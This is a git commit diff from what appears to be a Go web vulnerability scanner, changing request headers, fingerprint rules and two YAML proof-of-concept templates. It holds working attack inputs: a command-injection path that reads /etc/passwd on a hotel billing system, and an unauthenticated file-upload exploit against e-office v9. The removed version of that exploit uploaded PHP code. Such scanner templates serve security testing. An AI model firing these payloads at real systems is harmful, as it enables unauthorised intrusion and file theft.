加入hash碰撞、wmiiexec无回显命令执行

2026-02-09 02:09:17 +08:00 · 2022-11-19 17:04:13 +08:00
parent 4908720acb
commit 3e8f23466d
17 changed files with 749 additions and 239 deletions
--- a/WebScan/WebScan.go
+++ b/WebScan/WebScan.go
@@ -40,10 +40,13 @@ func Execute(PocInfo common.PocInfo) {
 		common.LogError(errlog)
 		return
 	}
-	req.Header.Set("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
+	req.Header.Set("User-agent", common.UserAgent)
+	req.Header.Set("Accept", common.Accept)
+	req.Header.Set("Accept-Language", "zh-CN,zh;q=0.9")
 	if common.Cookie != "" {
 		req.Header.Set("Cookie", common.Cookie)
 	}
+	req.Header.Set("Connection", "close")
 	pocs := filterPoc(PocInfo.PocName)
 	lib.CheckMultiPoc(req, pocs, common.PocNum)
 }
--- a/WebScan/info/rules.go
+++ b/WebScan/info/rules.go
@@ -250,7 +250,6 @@ var RuleDatas = []RuleData{
 	{"JEECMS", "code", "(/r/cms/www/red/js/common.js|/r/cms/www/red/js/indexshow.js|Powered by JEECMS|JEECMS|/jeeadmin/jeecms/index.do)"},
 	{"CMS", "code", "(Powered by .*CMS)"},
 	{"目录遍历", "code", "(Directory listing for /)"},
-	{"ATLASSIAN-Confluence", "code", "(confluence.)"},
 	{"向日葵", "code", "({\"success\":false,\"msg\":\"Verification failure\"})"},
 	{"Kubernetes", "code", "(Kubernetes Dashboard</title>|Kubernetes Enterprise Manager|Mirantis Kubernetes Engine|Kubernetes Resource Report)"},
 	{"WordPress", "code", "(/wp-login.php?action=lostpassword|WordPress</title>)"},
--- a/WebScan/pocs/Hotel-Internet-Manage-RCE.yml
+++ b/WebScan/pocs/Hotel-Internet-Manage-RCE.yml
@@ -2,9 +2,6 @@ name: Hotel-Internet-Manage-RCE
 rules:
  - method: GET
    path: "/manager/radius/server_ping.php?ip=127.0.0.1|cat /etc/passwd >../../Test.txt&id=1"
-    headers:
-      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"
-      Accept-Encoding: "gzip,deflate"
    expression: |
      response.status == 200 && response.body.bcontains(b"parent.doTestResult")
 detail:
@@ -12,4 +9,3 @@ detail:
  Affected Version: "Hotel Internet Billing & Operation Support System"
  links:
    - http://118.190.97.19:88/qingy/Web%E5%AE%89%E5%85%A8
-    
--- a/WebScan/pocs/e-office-v9-upload-cnvd-2021-49104.yml
+++ b/WebScan/pocs/e-office-v9-upload-cnvd-2021-49104.yml
@@ -1,23 +1,22 @@
-name: poc-yaml-e-office-v9-upload-cnvd-2021-49104
-manual: true
-transport: http
+name: e-office-v9-upload-cnvd-2021-49104
 set:
  r1: randomLowercase(8)
 rules:
  - method: POST
    path: /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=
    headers:
-    Content-Type: multipart/form-data;boundary=e64bdf16c554bbc109cecef6451c26a4
-    body: "--e64bdf16c554bbc109cecef6451c26a4\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"test.jsp\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php echo \"{{r1}}\"; unlink(__FILE__); ?>\r\n--e64bdf16c554bbc109cecef6451c26a4--\r\n\r\n"
-    follow_redirects: true
-    expression: |
-      response.status == 200 && response.body.bcontains(b"logo-eoffice")
+      Content-Type: multipart/form-data;boundary=e64bdf16c554bbc109cecef6451c26a4
+    body: |-
+      --e64bdf16c554bbc109cecef6451c26a4
+      Content-Disposition: form-data; name="Filedata"; filename="test.txt"
+      Content-Type: image/jpeg
+      {{r1}}
+      --e64bdf16c554bbc109cecef6451c26a4--
+    expression: response.status == 200  && response.body.bcontains(b"logo-eoffice")
  - method: GET
-    path: /images/logo/logo-eoffice.php
-    follow_redirects: true
-    expression: |
-      response.status == 200 && response.body.bcontains(bytes(r1))
+    path: /images/logo/logo-eoffice.txt
+    expression: response.status == 200 && response.body.bcontains(bytes(r1))
 detail:
-  author: we1x4n
+  author: szd790056181
  links:
-    - https://blog.csdn.net/weixin_44309905/article/details/121588557
+    - http://www.ctfiot.com/13682.html